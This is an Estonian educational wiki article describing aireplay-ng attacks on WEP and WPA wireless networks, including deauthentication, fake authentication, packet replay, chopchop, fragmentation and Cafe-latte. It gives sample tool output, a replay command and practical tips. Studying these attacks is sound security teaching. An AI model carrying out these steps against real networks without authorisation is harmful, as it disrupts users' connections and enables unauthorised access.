* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, broadcast disconnect on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.(?)&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud handshake&#039;id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
</feed>